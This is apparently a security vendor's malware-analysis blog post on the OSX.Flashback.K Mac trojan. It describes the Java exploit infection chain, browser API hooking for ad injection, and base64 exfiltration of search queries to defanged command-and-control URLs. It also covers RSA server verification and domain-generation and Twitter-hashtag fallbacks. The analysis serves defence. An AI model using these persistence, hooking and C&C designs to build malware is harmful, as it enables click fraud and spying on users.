OSX.FlashBack.K – An Overview and its Inner Workings

In our previous blogs, [1], [2], [3], and [4], we described how a computer may become infected with OSX.Flashback.K and provided various statistics about infected computers. The purpose of this blog is to describe the inner workings of the threat.

The ultimate goal of the OSX.Flashback.K Trojan is to generate money through ad-clicking. The threat employs multiple components in order to achieve this goal. The image below illustrates the various stages involved once OSX.Flashback.K gets downloaded on to a user’s computer through a drive-by-download of the malicious JAR file.
 

Figure 1. Threat overview
 

The malicious JAR file exploits the Oracle Java SE Remote Java Runtime Environment Code Execution Vulnerability (CVE-2012-0507) in order to drop an embedded MachO-1 executable file onto the computer.

This initial dropped MachO binary file is a downloader component that contacts a server to download additional binary files.

The server that the downloader component contacts is generated by a Domain Name Generation algorithm (DGA-1)**. DGA-1 uses the current date along with hard-coded values to generate 30 domains per day using the following top-level domains (TLD)[3]:

  • .com
  • .in
  • .info
  • .kz
  • .net

The downloaded binary file contains two MachO binaries: a loader (MachO-2) and an ad-clicking payload (MachO-3). Both of the binaries are then decrypted and dropped on to the compromised computer. The MachO-2 binary file is installed in such a way that it is ultimately loaded as part of the Web browser. This is achieved by modifying either of the following property list files depending upon the privilege or permissions it has in the computer:

  • /Applications/Safari.app/Contents/Info.plist
  • ~/.MacOSX/environment.plist

Upon execution, the MachO-2 binary loads the MachO-3 binary and hooks the CFReadStreamRead() and CFWriteStreamWrite() APIs in order to intercept Web browser traffic for the purpose of injecting advertisements.
 

Figure 2. Hooking procedure by Loader (MachO-1)
 

The threat then monitors a user’s outgoing network data to see if the user either clicks on a search query or clicks on an advertisement, as shown in the following image.
 

Figure 3. Web browser traffic interception
 

The threat is interested in two types of action that the user may perform:

  1. Clicking on a Google Advertisement
  2. Performing a search in a search engine

The threat attempts to identify any of the following parameters:

  • GET /url?
  • google
  • q=
  • sa=
  • ved=
  • usg=

Each of these is typically found when a user clicks on a Google advertisement. If none of the domains from its whitelist are present in the query, then the threat gathers the parameters from the query, encodes them using base64, and sends the information to a command-and-control (C&C) server in the following form:

hxxp://[VERIFIED-C&C-SERVER]/click?data=[BASE64 CLICK PARAMATERS]

If the threat determines that the query is part of a regular Google search, it obtains the search query and sends it to the C&C server in the following form [4]:

hxxp://[VERIFIED C&C SERVER]search?q=[BASE64 QUERY]&ua=[BASE64 USER AGENT]&al=[BASE64 ACCEPTED LANGUAGE]&cv=[CLIENT VERSION]

The "User-Agent:" of the HTTP header in the above request contains the Base64-encoded PlatformUUID of the user’s computer. This is used so the attacker can verify that the request is from a legitimate compromised computer and so the attacker can also encrypt the response using the PlatformUUID.

The “verified C&C server” responds to this query with the ad-clicking URLs that will be injected into the user’s browser by using the hooked CFReadStreamRead() API code in the MachO-3 binary. By doing this, the user sees search results in response to their search query, but the search results are now from pay-per-click services the OSX.Flashback.K author has signed up for.

By replacing search results in the manner as shown above, the malware author will now receive money for every click performed by the user.
 

Verification of the C&C server

Since it is common for malware C&C servers to be taken down or hijacked by antivirus companies and law enforcement, the OSX.Flashback authors have incorporated an owner verification scheme into the threat.

For owner verification, the threat sends a query to all of the domains from the generated domain list (discussed later) in the following form:

GET /owncheck/ HTTP/1.1
Host: [C&C SERVER DOMAIN]
User-Agent: BASE64[PLATFORM UUID]
Connection: close

In response, the malicious server sends two parts of the data in the following form:

BASE64[Sha1([SERVER DOMAIN])]|BASE64[RSA SIGNATURE]

The first part is the sha1() value of the server domain and the second part is the RSA signature that is signed over the first part using an RSA private key. This procedure authenticates that the Flashback authors have control over the queried domain as they own the RSA private key.

Once verified, the threat checks for an update to the threat with the following query:

GET /auupdate/ HTTP/1.1
Host: [Verified C&C SERVER DOMAIN]
User-Agent: BASE64[COMPROMISED COMPUTERINFORMATION]
Connection: close

Note: [COMPROMISED COMPUTER INFORMATION] from above is of the form shown below.
 

Figure 4. [COMPROMISED COMPUTER INFORMATION] format
 

This is how a new version of the threat is delivered by the attacker.
 

Twitter hashtag search and Domain Generation Algorithm (DGA-2)

Apart from a list of hard-coded C&C server lists, the threat can update its C&C server address in one of the following two forms:

  1. Through a C&C server address obtained from a specific Twitter message having a specific hashtag in it. This Twitter message is found by a Twitter search, querying for specific hashtags. These hashtags are generated based on current date, by using values (day, month, year) as an index in a list of 34 predefined four letter strings, forming a 12 character hashtag.
     
  2. Through a C&C server generated using Domain Generation algorithm (DGA-2) using the current date, by using values (day, month, year) as an index in a list of 34 pre-defined four letter strings, forming a 12 character domain string and combining them with the 26 pre-defined top-level domains shown below.

 

Figure 5. 26 pre-defined top-level domains
 

Although the final motive behind all of this is to serve advertisements through pay-per-click services and to generate money, the use of techniques like Domain Generation Algorithm and public key cryptography demonstrates that the author is well-versed in the creation of malware.

Perhaps this experience comes from previous malware authoring in other operating systems?

As always, please keep your antivirus and other installed software up to date while we continue to monitor the threat landscape for more to come.

**We have seen two types of dropped MachO-1 downloader, one with a hard-coded server address to contact and another with a Domain Generation Algorithm (DGA-1) embedded within, this post talks about the later.